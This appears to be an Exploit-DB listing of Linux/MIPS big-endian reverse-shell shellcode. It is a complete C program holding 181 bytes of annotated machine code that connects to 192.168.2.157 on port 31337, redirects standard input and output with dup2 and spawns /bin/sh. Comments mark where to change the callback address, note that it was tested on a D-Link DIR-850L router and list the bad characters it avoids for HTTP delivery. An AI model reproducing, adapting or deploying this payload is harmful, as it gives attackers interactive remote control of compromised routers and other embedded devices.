Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse (192.168.2.157:31337/TCP) Shellcode (181 bytes)

EDB-ID:

45541

CVE:

N/A




Platform:

Linux_MIPS

Date:

2018-10-08


/*
 # Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)
 # Author: cq674350529
 # Date: 2018-10-07
 #  - execve('/bin/sh'), tcp - 192.168.2.157/31337
 #  - used in HTTP Request
 #  - tested on D-Link dir-850l router, avoid bad chars ('\x00', '\x20', '\x23', '\x0d\x0a')
 #  - based on rigan's shellcode and metasploit's shellcode, no encoder used
 */

#include <stdio.h>

unsigned char sc[] = 
            "\x24\x0f\xff\xfa"      // li      $t7, -6
            "\x01\xe0\x78\x27"      // nor     $t7, $zero
            "\x21\xe4\xff\xfd"      // addi    $a0, $t7, -3
            "\x21\xe5\xff\xfd"      // addi    $a1, $t7, -3
            "\x28\x06\xff\xff"      // slti    $a2, $zero, -1
            "\x24\x02\x10\x57"      // li      $v0, 4183 ( sys_socket )
            "\x01\x01\x01\x0c"      // syscall 0x40404
            "\xaf\xa2\xff\xff"      // sw      $v0, -1($sp)
            "\x8f\xa4\xff\xff"      // lw      $a0, -1($sp)
            "\x34\x0f\xff\xfd"      // li      $t7, -3 ( sa_family = AF_INET )
            "\x01\xe0\x78\x27"      // nor     $t7, $zero
            "\xaf\xaf\xff\xe0"      // sw      $t7, -0x20($sp)

            /* ================ You can change port here  ================= */
            "\x3c\x0e\x7a\x69"      // lui     $t6, 0x7a69 ( sin_port = 0x7a69 )
            /* ============================================================ */

            "\x35\xce\x7a\x69"      // ori     $t6, $t6, 0x7a69 
            "\xaf\xae\xff\xe4"      // sw      $t6, -0x1c($sp)

            /* ================ You can change ip here  ================= */
            "\x3c\x0e\xc0\xa8"      // lui     $t6, 0xc0a8         ( sin_addr = 0xc0a8 ...
            "\x35\xce\x02\x9d"      // ori     $t6, $t6, 0x029d                 ... 0x029d
            /* ============================================================ */

            "\xaf\xae\xff\xe6"      // sw      $t6, -0x1a($sp)
            "\x27\xa5\xff\xe2"      // addiu   $a1, $sp, -0x1e
            "\x24\x0c\xff\xef"      // li      $t4, -17  ( addrlen = 16 )
            "\x01\x80\x30\x27"      // nor     $a2, $t4, $zero
            "\x24\x02\x10\x4a"      // li      $v0, 4170 ( sys_connect )
            "\x01\x01\x01\x0c"      // syscall 0x40404
            "\x24\x0f\xff\xfd"      // li      t7,-3
            "\x01\xe0\x28\x27"      // nor     a1,t7,zero
            "\x8f\xa4\xff\xff"      // lw      $a0, -1($sp)   
            // dup2_loop:
            "\x24\x02\x0f\xdf"      // li      $v0, 4063 ( sys_dup2 )
            "\x01\x01\x01\x0c"      // syscall 0x40404
            "\x24\xa5\xff\xff"      // addi    a1,a1,-1 (\x20\xa5\xff\xff)
            "\x24\x01\xff\xff"      // li      at,-1
            "\x14\xa1\xff\xfb"      // bne     a1,at, dup2_loop
            "\x28\x06\xff\xff"      // slti    $a2, $zero, -1
            "\x3c\x0f\x2f\x2f"      // lui     $t7, 0x2f2f
            "\x35\xef\x62\x69"      // ori     $t7, $t7, 0x6269
            "\xaf\xaf\xff\xec"      // sw      $t7, -0x14($sp)
            "\x3c\x0e\x6e\x2f"      // lui     $t6, 0x6e2f
            "\x35\xce\x73\x68"      // ori     $t6, $t6, 0x7368
            "\xaf\xae\xff\xf0"      // sw      $t6, -0x10($sp)
            "\xaf\xa0\xff\xf4"      // sw      $zero, -0xc($sp)
            "\x27\xa4\xff\xec"      // addiu   $a0, $sp, -0x14
            "\xaf\xa4\xff\xf8"      // sw      $a0, -8($sp)
            "\xaf\xa0\xff\xfc"      // sw      $zero, -4($sp)
            "\x27\xa5\xff\xf8"      // addiu   $a1, $sp, -8
            "\x24\x02\x0f\xab"      // li      $v0, 4011 (sys_execve)
            "\x01\x01\x01\x0c";     // syscall 0x40404
         
void main(void)
{      
    void(*s)(void);
    printf("size: %d\n", sizeof(sc));
    s = sc;
    s();
}